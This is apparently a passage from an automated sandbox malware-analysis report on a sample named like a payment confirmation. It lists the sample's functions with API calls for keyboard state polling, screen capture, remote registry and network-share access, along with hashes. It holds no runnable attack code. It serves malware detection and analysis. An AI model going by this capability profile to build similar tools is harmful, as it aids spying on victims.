                                          • HeapAlloc.KERNEL32(00000000), ref: 0131B6C8
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0131B6E9
                                          • CopySid.ADVAPI32(00000000), ref: 0131B6F0
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0131B721
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0131B747
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0131B75B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 57699bca4fb051df378428880e1c622b3103af2e8383f5ed0880e05a09a7c4ae
                                          • Instruction ID: 7a0b41e9ee5fa3822b6da236f6c7b63e2f1df76b788c305d8d9990b3742394f1
                                          • Opcode Fuzzy Hash: 57699bca4fb051df378428880e1c622b3103af2e8383f5ed0880e05a09a7c4ae
                                          • Instruction Fuzzy Hash: 3C516F71A0020AAFEF14DFA8DD44EEEFB79FF04758F048159E915A7298DB309A15CB60
                                          Function 0133A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(00000000), ref: 0133A2DD
                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0133A2E9
                                          • CreateCompatibleDC.GDI32(?), ref: 0133A2F5
                                          • SelectObject.GDI32(00000000,?), ref: 0133A302
                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0133A356
                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0133A392
                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0133A3B6
                                          • SelectObject.GDI32(00000006,?), ref: 0133A3BE
                                          • DeleteObject.GDI32(?), ref: 0133A3C7
                                          • DeleteDC.GDI32(00000006), ref: 0133A3CE
                                          • ReleaseDC.USER32(00000000,?), ref: 0133A3D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                          • String ID: (
                                          • API String ID: 2598888154-3887548279
                                          • Opcode ID: f0cbbb7d726ba8938bc01bef5f480afa2d3b8e398944aa2e0e6b2b39b28902e2
                                          • Instruction ID: 7897e7442e8d148f36e1759cde9e1223e95bf75a115f09055eaf70d63b1f25f8
                                          • Opcode Fuzzy Hash: f0cbbb7d726ba8938bc01bef5f480afa2d3b8e398944aa2e0e6b2b39b28902e2
                                          • Instruction Fuzzy Hash: 17516C75A00309EFDB25CFA9D884EAEBBB9FF48310F14841DF99A97250C771A841CB54
                                          Function 0130BA66 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 219COMMON
                                          Download Yara Rule
                                          APIs
                                          • __lock.LIBCMT ref: 0130BA74
                                            • Part of subcall function 01308984: __mtinitlocknum.LIBCMT ref: 01308996
                                            • Part of subcall function 01308984: EnterCriticalSection.KERNEL32(01300127,?,0130876D,0000000D), ref: 013089AF
                                          • __calloc_crt.LIBCMT ref: 0130BA85
                                            • Part of subcall function 01307616: __calloc_impl.LIBCMT ref: 01307625
                                            • Part of subcall function 01307616: Sleep.KERNEL32(00000000,?,01300127,?,012E125D,00000058,?,?), ref: 0130763C
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 0130BAA0
                                          • GetStartupInfoW.KERNEL32(?,01396990,00000064,01306B14,013967D8,00000014), ref: 0130BAF9
                                          • __calloc_crt.LIBCMT ref: 0130BB44
                                          • GetFileType.KERNEL32 ref: 0130BB8B
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0130BBC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                          • String ID: 2u
                                          • API String ID: 1426640281-169037360
                                          • Opcode ID: 76cc2bd91df74086ffe0dc1d22589eec60d607d47f94a37e657a75be0b0400e7
                                          • Instruction ID: 533ec44a373aee4796a4126739ba5271d47a793f20fa2d5cbf837e860dcb7389
                                          • Opcode Fuzzy Hash: 76cc2bd91df74086ffe0dc1d22589eec60d607d47f94a37e657a75be0b0400e7
                                          • Instruction Fuzzy Hash: C881F5749047468FDB26CF6CC8A06A9FBF8AF05328F24425DD4A6AB3D9D7349803CB54
                                          Function 0132D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 0132D567
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0132D589
                                          • __swprintf.LIBCMT ref: 0132D5DC
                                          • _wprintf.LIBCMT ref: 0132D68D
                                          • _wprintf.LIBCMT ref: 0132D6AB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 2116804098-2391861430
                                          • Opcode ID: 4ebdbfd62e6f214e200ef1ca81154d158c79056b31421c50dde030f17561e1d9
                                          • Instruction ID: a6b8f78e55c760175ebd45d65a76e28edcad649a9e37d746b9b536a617ab3cbe
                                          • Opcode Fuzzy Hash: 4ebdbfd62e6f214e200ef1ca81154d158c79056b31421c50dde030f17561e1d9
                                          • Instruction Fuzzy Hash: D351A37190011ABADF25FBE4CD45EFEB7B9BF24208F904165E205B2160EB355F58CBA0
                                          Function 0132D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0132D37F
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0132D3A0
                                          • __swprintf.LIBCMT ref: 0132D3F3
                                          • _wprintf.LIBCMT ref: 0132D499
                                          • _wprintf.LIBCMT ref: 0132D4B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 2116804098-3420473620
                                          • Opcode ID: a0e811c3fe4088b4b75faf5f2dba667fdbc13cd76a09fac478fc79146ac1a976
                                          • Instruction ID: 69fdd65db075c655f4a71f9b5713a97c3e5e561ebce96344599c0850942c907f
                                          • Opcode Fuzzy Hash: a0e811c3fe4088b4b75faf5f2dba667fdbc13cd76a09fac478fc79146ac1a976
                                          • Instruction Fuzzy Hash: D251A27290011AAADF15FBE4CD49EFEB7B9AF24708F504065E205B2160EB356F58CB60
                                          Function 0131AEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • _memset.LIBCMT ref: 0131AF74
                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0131AFA9
                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0131AFC5
                                          • RegOpenKeyExW.ADVAPI32 ref: 0131AFE1
                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0131B00B
                                          • CLSIDFromString.OLE32(?,?), ref: 0131B033
                                          • RegCloseKey.ADVAPI32(?), ref: 0131B03E
                                          • RegCloseKey.ADVAPI32(?), ref: 0131B043
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                          • API String ID: 1411258926-22481851
                                          • Opcode ID: a7a729eb9cd89acccd544da4728d2a0934a383f5830bcf5916015443cce66b1b
                                          • Instruction ID: 8cac1681968b68410b64e6cdc0e4cbf669f1f69bc1b1195595142236ed1785ca
                                          • Opcode Fuzzy Hash: a7a729eb9cd89acccd544da4728d2a0934a383f5830bcf5916015443cce66b1b
                                          • Instruction Fuzzy Hash: 46411876C2022DAADF25EBA4DC989EEB7B8BF14744F404129E901A3164EB309A15CB90
                                          Function 01343AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01343B0E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                          • API String ID: 3964851224-909552448
                                          • Opcode ID: 1e5ce470f979cd5d3c42512b471df4dede8506c15e622c2ee6c2dffa9b95a386
                                          • Instruction ID: 64aee75f1ea0a0a01d71b47c1d4d98afb3824d485c0350844cd483ee2b504115
                                          • Opcode Fuzzy Hash: 1e5ce470f979cd5d3c42512b471df4dede8506c15e622c2ee6c2dffa9b95a386
                                          • Instruction Fuzzy Hash: 8641C23916026BCFDF05EF48DA50BFA33A5BF25258F440828EDA14B695DB30AD1ACB54
                                          Function 013283D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0132843F
                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 01328455
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 01328466
                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 01328478
                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 01328489
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 2279737902-1007645807
                                          • Opcode ID: bd102bdeb4bc94ebb625fd363ef2d06820ec90cdd72b04e87eb64293af4416c0
                                          • Instruction ID: 51dd61193c2152a1bd44cdcd04a69755db69e3d7f1876b2431f706a22abf94cd
                                          • Opcode Fuzzy Hash: bd102bdeb4bc94ebb625fd363ef2d06820ec90cdd72b04e87eb64293af4416c0
                                          • Instruction Fuzzy Hash: 551186B1A6016D79DB20B7B6DC49DFF7EFCFBA1B08F44081DE411A2190DAB05944C6B1
                                          Function 01328097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 0132809C
                                            • Part of subcall function 012FE3A5: timeGetTime.WINMM ref: 012FE3A9
                                          • Sleep.KERNEL32(0000000A), ref: 013280C8
                                          • EnumThreadWindows.USER32 ref: 013280EC
                                          • FindWindowExW.USER32 ref: 0132810E
                                          • SetActiveWindow.USER32 ref: 0132812D
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0132813B
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0132815A
                                          • Sleep.KERNEL32(000000FA), ref: 01328165
                                          • IsWindow.USER32 ref: 01328171
                                          • EndDialog.USER32 ref: 01328182
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                          • String ID: BUTTON
                                          • API String ID: 1194449130-3405671355
                                          • Opcode ID: de3026e998f7ed18d607515284c71d60bd983166cf0cb1708a8993fad4c46136
                                          • Instruction ID: 8d6b0319c8c5ca9bb34b643d99c523172cbec90bad09b1dfc0314b274badb201
                                          • Opcode Fuzzy Hash: de3026e998f7ed18d607515284c71d60bd983166cf0cb1708a8993fad4c46136
                                          • Instruction Fuzzy Hash: 2921C3B4300215FFF7326BA5EC88B667FAEFB1438CF548114F642922A9CB765C008711
                                          Function 013232B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,01353C64,00000010,00000000,Bad directive syntax error,0137DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 013232D1
                                          • LoadStringW.USER32(00000000,?,01353C64,00000010), ref: 013232D8
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • _wprintf.LIBCMT ref: 01323309
                                          • __swprintf.LIBCMT ref: 0132332B
                                          • MessageBoxW.USER32 ref: 01323395
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 1506413516-4153970271
                                          • Opcode ID: 219e7986a4725610f7f74ed6dbf97ac30a8789d7e3b74bf81189a79433c59ff1
                                          • Instruction ID: 85ade0ee2589472c068535022ab1a33b76b27438157f3cb595eb50f6f8a435a5
                                          • Opcode Fuzzy Hash: 219e7986a4725610f7f74ed6dbf97ac30a8789d7e3b74bf81189a79433c59ff1
                                          • Instruction Fuzzy Hash: 50218B7185021ABBCF12EFD0CC49EFE77B9BF28708F404455F605A11A0EB75AA58CB51
                                          Function 013278EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                          • String ID: 0.0.0.0
                                          • API String ID: 208665112-3771769585
                                          • Opcode ID: df23f2910d9b8b0048361f531df63dca1db1a45474f4accb8c1a7477bdf51fa7
                                          • Instruction ID: ba81bafad9af448cdf34d1d5b92c7a02003a608833df70db2e0528f32e0f8019
                                          • Opcode Fuzzy Hash: df23f2910d9b8b0048361f531df63dca1db1a45474f4accb8c1a7477bdf51fa7
                                          • Instruction Fuzzy Hash: 8A112731A04226AFDB35BB78DC08EEE77BCFF10728F0000A5E04596090EF74D6808BA1
                                          Function 012E2F58 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColorBrush.USER32 ref: 012E2F8B
                                          • RegisterClassExW.USER32(00000030), ref: 012E2FB5
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012E2FC6
                                          • InitCommonControlsEx.COMCTL32(?), ref: 012E2FE3
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 012E2FF3
                                          • LoadIconW.USER32 ref: 012E3009
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 012E3018
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 359a805a28be881a88b1c55da7d786cbb58f8144e33c16078b0a1a3e7938cbe4
                                          • Instruction ID: f8c5bb7a3510aaf75040e9303151fdd8e9f3abc6c11c55b13f5b5ac6f840cd2d
                                          • Opcode Fuzzy Hash: 359a805a28be881a88b1c55da7d786cbb58f8144e33c16078b0a1a3e7938cbe4
                                          • Instruction Fuzzy Hash: 6A21D0B5A00218AFDB209FA5E849B8EBFF8FB08744F00811AE665A6294D7B445448F91
                                          Function 013308D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                          • String ID:
                                          • API String ID: 3566271842-0
                                          • Opcode ID: 4d8a5ab89fe088c18a35a77b4c58dd373873869fe6827246d0464ea5211c6e5a
                                          • Instruction ID: c60e0e334b9c69e672a1982cde9b01d41380b7b1464769f79dfc984d34afcd74
                                          • Opcode Fuzzy Hash: 4d8a5ab89fe088c18a35a77b4c58dd373873869fe6827246d0464ea5211c6e5a
                                          • Instruction Fuzzy Hash: 76710D75A10119AFDB15DFA8C888ADEB7F8FF48314F048495E919AB261D734EE40CF94
                                          Function 0132388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 01323908
                                          • SetKeyboardState.USER32(?), ref: 01323973
                                          • GetAsyncKeyState.USER32 ref: 01323993
                                          • GetKeyState.USER32(000000A0), ref: 013239AA
                                          • GetAsyncKeyState.USER32 ref: 013239D9
                                          • GetKeyState.USER32(000000A1), ref: 013239EA
                                          • GetAsyncKeyState.USER32 ref: 01323A16
                                          • GetKeyState.USER32(00000011), ref: 01323A24
                                          • GetAsyncKeyState.USER32 ref: 01323A4D
                                          • GetKeyState.USER32(00000012), ref: 01323A5B
                                          • GetAsyncKeyState.USER32 ref: 01323A84
                                          • GetKeyState.USER32(0000005B), ref: 01323A92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 9b4c0db931a55c101e44858462d75458173442910544f449f4393acf066af7f0
                                          • Instruction ID: a8ee8f5b35e0fcaaaa2949546f4e55b2d1062ef36852539901f9cdbd6f3bb890
                                          • Opcode Fuzzy Hash: 9b4c0db931a55c101e44858462d75458173442910544f449f4393acf066af7f0
                                          • Instruction Fuzzy Hash: AE51DC30A047A469FB35FBAC84107EABFF46F15648F08859DC6C25B1C2DB68974CC762
                                          Function 0131FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 0131FB19
                                          • GetWindowRect.USER32(00000000,?), ref: 0131FB2B
                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0131FB89
                                          • GetDlgItem.USER32(?,00000002), ref: 0131FB94
                                          • GetWindowRect.USER32(00000000,?), ref: 0131FBA6
                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0131FBFC
